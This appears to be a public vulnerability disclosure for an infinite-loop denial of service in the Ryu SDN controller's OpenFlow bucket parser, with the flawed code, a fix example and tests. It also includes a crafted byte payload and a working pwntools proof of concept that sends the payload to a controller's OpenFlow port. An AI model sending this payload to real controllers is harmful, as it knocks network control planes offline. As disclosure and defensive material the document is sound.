@ErodedElk
Created April 9, 2024 17:19
An issue was discovered in OFPBucket in parser.py in Faucet SDN Ryu version 4.34, which allows remote attackers to cause a denial of service (DoS) via an infinite loop.

In /ryu/ofproto/ofproto_v1_3_parser.py at about line 3607:

class OFPBucket(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
        (len_, weight, watch_port, watch_group) = struct.unpack_from(
            ofproto.OFP_BUCKET_PACK_STR, buf, offset)
        ....
        # msg.len is the bucket length read from the message; action.len is the
        # length each OFPAction reports for itself, also read from the message
        while length < msg.len:
            action = OFPAction.parser(buf, offset)
            msg.actions.append(action)
            offset += action.len   # with action.len == 0 neither offset ...
            length += action.len   # ... nor length advances, so the loop never ends

If action.len == 0, the offset and length no longer change and the parsing falls into an infinite loop.

payload:

payload = b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x06\x00\x00\x00\x00\x00\x00\x00\x00"

poc:

from pwn import *

p = remote("0.0.0.0", 6633)  # the controller's OpenFlow listening port
# OFPT_MULTIPART_REPLY / OFPMP_GROUP_DESC carrying one bucket whose OFPAT_SET_FIELD action has len = 0
payload = b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x06\x00\x00\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()

This PoC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message carries an OFPGroupDescStats structure, which in turn carries an OFPBucket, in which the length field of the OFPAction is tampered with to 0.

Note, however, that not all OFPAction types take their length from the length field of the message when they are parsed. In this example, OFPActionSetField, which does, is used for demonstration.

The same problem occurs in the following code:

/ryu/ofproto/ofproto_v1_3_parser.py at about line 3607
/ryu/ofproto/ofproto_v1_4_parser.py at about line 5416
/ryu/ofproto/ofproto_v1_5_parser.py at about line 6495
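As an added defensive example (not code from this gist or from Ryu), here is a bucket action-list walker with the length check the loop above lacks, run against the bucket bytes from the payload above and a well-formed variant; the constants, the sample bytes and the `MalformedMessage` type are this example's own constructions.

```python
import struct

OFP_ACTION_HEADER_SIZE = 4   # ofp_action_header: type (2) + len (2)
OFP_BUCKET_SIZE = 16         # ofp_bucket: len, weight, watch_port, watch_group, pad[4]
OFPAT_SET_FIELD = 25


class MalformedMessage(ValueError):
    """Raised instead of looping when an action length cannot advance the cursor."""


def parse_bucket_actions(buf, offset, bucket_len):
    """Walk the action list of one OFPBucket and return (type, len) pairs.

    Unlike the vulnerable loop, every action length is checked before it is
    used to advance `offset`, so the loop always terminates.
    """
    end = offset + bucket_len
    if bucket_len < OFP_BUCKET_SIZE or end > len(buf):
        raise MalformedMessage("bucket length %d out of range" % bucket_len)
    offset += OFP_BUCKET_SIZE
    actions = []
    while offset < end:
        if end - offset < OFP_ACTION_HEADER_SIZE:
            raise MalformedMessage("truncated action header at offset %d" % offset)
        type_, len_ = struct.unpack_from("!HH", buf, offset)
        # The missing check: a zero (or undersized, unaligned, or overlong)
        # length would leave offset unchanged and spin forever.
        if len_ < OFP_ACTION_HEADER_SIZE or len_ % 8 or offset + len_ > end:
            raise MalformedMessage("bad action length %d at offset %d" % (len_, offset))
        actions.append((type_, len_))
        offset += len_
    return actions


def is_well_formed(buf, offset, bucket_len):
    try:
        parse_bucket_actions(buf, offset, bucket_len)
        return True
    except MalformedMessage:
        return False


# Constructed samples. Bucket header (len=32, weight=1, watch_port/group=ANY, pad) is shared.
BUCKET_HDR = b"\x00\x20\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00"
# OFPAT_SET_FIELD body: OXM eth_src header (0x80000806), 6-byte value, 2 bytes padding.
SET_FIELD_BODY = b"\x80\x00\x08\x06" + b"\x00" * 8
BUCKET_OK = BUCKET_HDR + b"\x00\x19\x00\x10" + SET_FIELD_BODY        # action len = 16
BUCKET_ZERO_LEN = BUCKET_HDR + b"\x00\x19\x00\x00" + SET_FIELD_BODY  # action len = 0, as in the PoC

if __name__ == "__main__":
    print(parse_bucket_actions(BUCKET_OK, 0, 32))   # [(25, 16)]
    print(is_well_formed(BUCKET_ZERO_LEN, 0, 32))    # False
```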